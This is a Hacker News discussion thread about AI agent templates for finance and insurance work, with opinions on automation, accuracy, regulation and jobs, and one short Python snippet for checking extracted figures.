Why? It sounds exactly like the design I would hope for. It automates what I'm going to do already without needing to wait. And it allows you to bypass it entirely and just revert to the manual process (along with waiting).
sholladay16 hours ago
That all sounds reasonable until you realize that the same logic is how we ended up with customer support systems that try to walk you through a phone tree, where if you are lucky you can press 0 to speak to a human without first answering a bunch of questions and being referred to the online help articles.
Do you enjoy using any of those systems? Do you want the world to be that way?
JamesSwift16 hours ago
Maybe we are interpreting the GP differently. In this scenario, the phone tree is asking the same questions that the human agent is going to ask, but does it immediately when I call rather than making me wait for an operator to ask them. And as long as I can "press 0 to eject" (just like I can in the accounting scenario), it's completely kosher to me.
stubish6 hours ago
No, we end up with crappy systems because people are optimizing to save money over providing a good service. OP has simply replaced the traditional room full of clerks applying policy rigorously with a Bayesian algorithm and now AI. The management and oversight are still in place, and that is what makes a system that doesn't suck. To make it suck and save money, you remove access to that oversight or just remove it altogether. And falling down that slippery slope is not inevitable, even if it sometimes seems like it is.
KellyCriterion15 hours ago
Regarding customer support on the phone: I usually have luck just waiting and not responding to the phone bot; very often you are routed to a human in the end :-D
mikeyouse16 hours ago
In many businesses, the employee is responsible for inputting most of that. If a LLM can get to 95% accuracy and flag exceptions, the employees (and AP team) would actually have less work and bureaucracy.
Though we’ve had a few incidents where employees have submitted AI-generated receipts for reimbursement, which is another issue...
notahacker13 hours ago
It's already pretty common for some sort of tool involving some sort of AI to collect receipt data, attempt to categorise it, and hook up to your accounts. They also make mistakes, though the advantage of more tractable, less configurable, and more limited models is that they're unlikely to interpret a prompt as "invent receipts that have never been submitted" or "delete records", and they're trained much more on receipt OCR and less on poetry...
As a business, you've also got to remember that employees are much more likely to complain if the 'agent' or any other form of automation errs by denying their claim or underpaying than the reverse. Depending on the scale of expenses and how likely you are to be audited, the cost of the odd mistake might be more or less than the cost of doing it manually.
Zopieux8 hours ago
Please tell me those are former employees. How can anyone feel confident committing such blatant fraud.
infecto17 hours ago
What is your point? This is pretty normal expense management in any company setting. I don’t know what is so bad about being on the other side of it. I hope I am not too inflammatory by asking what the point is, but genuinely, you pointed it out like it’s some archaic process flow when it’s part of almost every expense system.
ofjcihen16 hours ago
I guess my current company’s processes may be easier to deal with than others. That or my position affords me some extra catering to.
The system is currently using a simple app to submit expenses and any issues gets a simple human chat request and a call if requested.
They try to avoid kicking anything back and if they do they make sure it’s reviewed first to make sure that it’s needed and to make sure the reason is understood.
Our company is also very large so I’m not sure how they manage but they do. People rave about the process instead of hating it.
infecto16 hours ago
Thanks for the thoughtful reply. To add some color… most expense systems are set up so that the user has to input a couple of fields like the category or GL code. Some of the fields might be auto-populated. Some companies might not care about the classification, but usually the intent is to capture things like travel or software etc. What was described earlier is really not painful for users most of the time, but an LLM helps automate so much of it these days.
infecto17 hours ago
Yes. On the accounting side, agents can handle a lot of the low-value work like recons and other ledger activity pretty well. On the investment side I think, as you pointed out, it’s going to be a lot of research: industry, company, macro, etc. The value is in letting it run on top of the data you have and put together ideas at a quicker pace than a human can. There is still a human in the loop, but it can do a nice job of lining up thoughts you might have otherwise missed.
Havoc15 hours ago
What does the integration look like on accounting? Is this a tool provided by the accounting software provider?
I'm in that space so naturally interested in what people are up to :)
bvan7 hours ago
Yes, in very specific cases where I fully understand the methodology(ies) that is (are) applicable, and am able to verify correct implementation. Also, as an enhanced ‘Google search’ to supplement what I have found. I am the skeptical type… yet, so far have been impressed. But, I wouldn’t trust using AI to blindly give me solutions to a problem I couldn’t solve myself, albeit much more slowly.
torben-friis14 hours ago
Pretty good, as a dev with finance stakeholders. We have skills in place acting over our automated month-end closing, and they were able to provide manual checks and flag issues, for example.
Nowhere near self sufficient tools though, just great to answer questions over the data that would usually take a few hours of custom scripting/excel. I wouldn't trust our stakeholders using AI directly either, being frank.
timbaboon17 hours ago
Seen it used in some of the fraud models (I work in insurance). So that's both from the perspective of people trying to claim fraudulently and of suppliers overcharging. I can't say how much of a lift we actually get vs existing ML models.
iewjj17 hours ago
Nope. If anything, firms are pulling back (I know someone closely who works at BlackRock).
semiquaver17 hours ago
I don’t just know someone who works in finance, I am someone who works in finance and I say you’re wrong.
iewjj17 hours ago
[flagged]
infecto17 hours ago
Let’s state the obvious. You have an account that was just created. You are posting specific details internal to a company, in what is typically a biased area. And now you're throwing vulgarities out. No credibility.
iewjj17 hours ago
Don’t really care, fella. If you don’t believe it, screenshot my posts and revisit in 6 months.
I’d put money behind what I say. Would you?
kx_x9 hours ago
In what context?
For research and thesis evaluations, we're observing that firms (names we all know) are bullish and even eager to try AI products.
Regarding automated asset management and the like, there's indeed much more apprehension.
biophysboy17 hours ago
pulling back as in setting more realistic token budgets, or something more drastic? I'm curious
iewjj17 hours ago
Stopped using them altogether in the context of productivity - in essence they’re useless.
roughly17 hours ago
I can believe that. Gambler’s Ruin gets costly when you’ve actually got money on the line.
TacticalCoder13 hours ago
> For those in the finance space, are you actually seeing any real AI tools being used? Like for actual operational tasks?
> I've really only seen it used for research / exploration thus far
Summaries and translation for sure.
Speaking with devs in the field, I know that AI tools are used to summarize and extract data from... PDFs. Now, thankfully, LLMs got better at answering "How many r's in 'strawberry'?", and it looks like they're good enough for summarizing PDFs and extracting key numbers, but I'd still be cautious.
And I've got a friend who's a translator specifically for financial documents: she's a contractor and getting about 1/10th of the work (and 1/10th of the pay) she used to have, since now she's only tasked to verify that the translations are correct. Of course she already had lots of tools, way before the LLM era, automating some of her work, but she was still billing the use of those tools. Now LLMs are doing nearly all the work, and not "for her": it's happening upstream and she only gets the output of the LLMs and has to verify it. And there aren't that many errors.
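One cheap guard when extracting numbers from PDFs, for what it's worth: check that every figure the model returns literally appears in the source text. A sketch (the key names here are illustrative, not any real system's schema):

```python
import re

# Matches figures like "42", "1,234" or "1,234.5".
NUM_RE = re.compile(r"\d[\d,]*(?:\.\d+)?")

def hallucination_check(source_text, extracted):
    """Flag any extracted figure that does not appear verbatim in the source.

    This catches the classic failure mode where the model invents or
    mis-transcribes a number; it does NOT prove the number was attached
    to the right label, so a human check is still warranted.
    """
    found = set(NUM_RE.findall(source_text))
    return {key: str(value) in found for key, value in extracted.items()}
```

So `hallucination_check("Revenue was 1,234.5 in Q3", {"revenue": "1,234.5", "profit": "999"})` would pass the revenue but flag the profit as unverifiable.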
apaprocki16 hours ago
We’re integrating AI tooling into the Bloomberg Terminal for everyone to use.
https://www.bloomberg.com/professional/insights/press-announ...
jcims13 hours ago
This is great but as someone in infrastructure tech at a large financial, there is almost no framework for cleanly separating control from data plane operations, read vs write, anything. As of right now you have to build nearly all of that yourself.
It feels like juggling pipe bombs and I have a ton of empathy for the teams being pressured by the business to roll them out with no appreciation for the regulatory rat's nest that ensues.
botacode14 hours ago
Great to see more insurance hype! We've been working on AI to solve the consumer search problem in the industry for the past 3 (almost 4) years and it's great to see the big labs getting their hands dirty and building tools for practitioners in the space.
More industry exposure to well-managed agentic experiences will create oodles of opportunities to reduce premiums for consumers and offset some inflation-driven increases in the cost of coverage.
BrandiATMuhkuh13 hours ago
We tried it just before. It's interesting what it does: writing lots of Python scripts.
However, the result (Excel/spreadsheet) looks different each time you run it, which is annoying when you run it at the end of each month.
btw: this is not surprising when you look at the low level of detail in the skills.
dkersten14 hours ago
Given the quality of Claude code lately, I wouldn’t trust them in financial services.
0123456789ABCDE17 hours ago
Patagonia is gonna lose some clientele
KellyCriterion15 hours ago
haha, insider! :-D
Just yesterday I told a colleague that he should buy some of their vests for his company :-D
HyperL0gi9 hours ago
Anyone still use Claude Design? I’ve not seen any mentions on X, here, or YouTube recently, so I wonder if it was all hype or if people are actually using it.
traceroute6615 hours ago
I stopped reading at paragraph one:
"ready-to-run agent templates for the most time-consuming work in financial services: building pitchbooks, screening KYC files, and closing the books at month-end"
Ok, maybe you can squeeze a vaguely passable pitchbook out of Claude.
But screening KYC files or closing books at month-end ?
"I'll have some of what they're smoking" as the cool kids say.
No regulator or tax office on this planet is going to accept the "but Claude said it was ok" excuse.
The only people who are going to profit out of this are Anthropic, Lawyers and Governments (through increased fines).
Lio15 hours ago
Wow, really going for those white collar jobs. This is going to be an interesting few years.
scottyah9 hours ago
Just a natural rebalancing of the Rise of the Laptop Class. I think we'll get more productive as white-collar jobs become more efficient, with fewer days of 8 hours of meetings and responding to emails from people too lazy to look information up themselves.
23dsfds9 hours ago
What will happen is what has happened for the past few years: mostly nothing. People stay employed, things keep trucking forward.
LLMs do not change the equation all that much: humans' ability to imagine is the most scarce resource on the planet, and LLMs will not help all that much with it.
jqpabc12317 hours ago
AI and finance --- what could possibly go wrong?
Better Call Saul when (not if) it does.
Ekaros15 hours ago
Well at that point you can use AI as legal help, right?
jqpabc1237 hours ago
Yes, you can. But expect similar results.
https://www.lawnext.com/2025/05/ai-hallucinations-strike-aga...
sharadov16 hours ago
Next couple weeks - financial and insurance services announce layoffs!
KellyCriterion15 hours ago
There was a paper lately claiming that banks & insurers are going to lay off around 200k people globally in the next few years (which, according to them, would be a reduction of 3-4% of finance staff).
sovenyr4 hours ago
This is too risky for me!
prosunpraiser14 hours ago
Of course - finance is the best domain to depkiy a stochastic parrot which hallucinates and forgets stuff frequently and doesn’t follow your instructions - even with SOTA models. One where you need absolute accuracy and auditabikity.
Why didn’t I think of that.
throwpoaster14 hours ago
Because the l on your keyboard is broken?
vatsachak17 hours ago
Everything is going to be slop, and you're going to like it.
Is the plan to have an LLM do everything? And do it worse?
"Oh yeah my Claude didn't agree with the pitch from their Claude"
The goal of current tech is to make humanity a gerbil running on a Claude wheel
soupspaces5 hours ago
Follow the money, until you can't (compute credits)
nothinkjustai17 hours ago
At that point what even is the point of doing anything at all? Like, it’s less than useless.
vatsachak15 hours ago
That is what people like Thiel actually believe, that humanity is just a cradle to bring about a machine god.
I don't necessarily disagree with that but doing it through LinkedIn slop companies? Come on man you know better than that
simianwords14 hours ago
Does anyone else think "agents" are the wrong abstraction? Agents look like UI wrappers over LLMs; they are inherently not composable. Tailor-made agents for UIs don't seem to scale. I predict they won't take off.
What I predict instead is that we will have a common UI-layer plugin and a "protocol" that can speak to UI elements; this might be more composable.
guluarte14 hours ago
How long until Anthropic or OpenAI builds an interview platform around AI tools, where candidates build a feature end to end using AI?
As someone who has been interviewing lately, I think this is the next step after leetcode and whiteboard style interviews.
dakolli16 hours ago
Why would this be useful in a zero-sum environment like markets? Why would you want to use the same tool that everyone else has access to? Top performers will always be the people who hand-craft their solutions, just like the top performers in the watch space are the people who make handmade watches in Switzerland, not the guys making 100k watches a month in China.
codemog17 hours ago
Making the most convoluted and idiotic insurance process on earth and then delegating that process to an AI that requires huge buzzing data centers... Is there an option to respawn in the non-clown-world universe? It was funny at first, but it gets tiring eventually.
jeffreyrogers14 hours ago
What does a better insurance process look like? Outside of health insurance, which is complicated for a variety of reasons, most insurance is pretty easy to procure. I got an umbrella policy recently and it took about 30 minutes of talking with an agent and answering pretty reasonable questions.
codemog13 hours ago
1. A better insurance process is clearly out of the scope of a hn comment, and I have trouble believing you don’t know that too.
2. I’m almost certainly talking about health insurance, made obvious by you even mentioning that. There’s a HN guideline about discussing in good faith.
3. I find it humorous you hand-wave away our inhuman healthcare system as “for a variety of reasons”.
4. I see your career is in hedge funds, defense, and big tech. Best of luck ;)
jeffreyrogers12 hours ago
I don't think it's obvious that you were talking about health insurance, which I consider fairly distinct from property, casualty, liability, and life insurance, which are all quite large markets in themselves. The reason I made a distinction is because health insurance is quite different from other lines of insurance because healthcare is federally regulated while other insurance is regulated at the state level.
As mentioned the problems with the US healthcare system are numerous, complex, and interrelated. I don't think they have a simple solution, nor do I think they are insurance problems at their core. For example the cost of drugs in the US vs the rest of the world has very little to do with insurance.
ramchella12 hours ago
[flagged]
lpcvoidan hour ago
[dead]
thepitstop_ai11 hours ago
[dead]
dk97011 hours ago
[flagged]
axiosgunnar17 hours ago
[dead]